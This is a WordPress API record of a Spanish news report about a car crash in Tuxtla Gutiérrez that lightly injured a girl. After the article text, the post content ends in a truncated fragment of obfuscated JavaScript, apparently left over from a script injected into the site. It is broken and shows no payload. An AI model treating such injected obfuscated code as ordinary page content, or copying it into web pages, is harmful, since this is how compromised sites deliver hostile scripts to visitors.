{"id":8690,"date":"2023-02-15T03:36:02","date_gmt":"2023-02-15T03:36:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8690"},"modified":"2023-02-15T03:36:03","modified_gmt":"2023-02-15T03:36:03","slug":"una-menor-lesionada-saldo-de-choque-entre-particulares","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8690","title":{"rendered":"Una menor lesionada, saldo de choque entre particulares"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676432089022.jpg\" alt=\"\" class=\"wp-image-8691\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676432089022.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676432089022-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 14 de febrero del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un choque ocurrido este martes por la tarde entre dos unidades particulares dej\u00f3 un saldo de una menor herida.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este accidente ocurri\u00f3 cuando una Kia Soreto, de color blanco circulaba sobre la carretera a Emiliano Zapata, y a la altura del pante\u00f3n ejidal de Ter\u00e1n una camioneta Ford Ranger de color negro sali\u00f3 de una casa particular de reversa sin precauci\u00f3n ocasionando la colisi\u00f3n.<\/p>\n\n\n\n<p>En el lugar se di\u00f3 a conocer que, la camioneta Ranger no ten\u00eda conductor, al quedar en una pendiente bot\u00f3 la velocidad y sali\u00f3 del estacionamiento de la casa.<\/p>\n\n\n\n<p>Una menor qued\u00f3 atrapada en la Ranger la cual fue auxiliada por los mismos vecinos del lugar.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil para realizar una valoraci\u00f3n y se determin\u00f3 que, la menor presentaba heridas que no eran de riesgo.<\/p>\n\n\n\n<p>En el lugar se di\u00f3 a conocer que, los involucrados en este percance llegaron a un acuerdo econ\u00f3mico y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 14 de febrero del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un choque ocurrido este martes por la tarde entre dos unidades particulares dej\u00f3 un saldo de una menor herida. Los reportes de tr\u00e1nsito informaron que, este accidente ocurri\u00f3 cuando una Kia Soreto, de color blanco circulaba sobre la carretera a Emiliano Zapata, y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8691,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8690","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8690","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8690"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8690\/revisions"}],"predecessor-version":[{"id":8692,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8690\/revisions\/8692"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8691"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8690"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8690"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8690"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}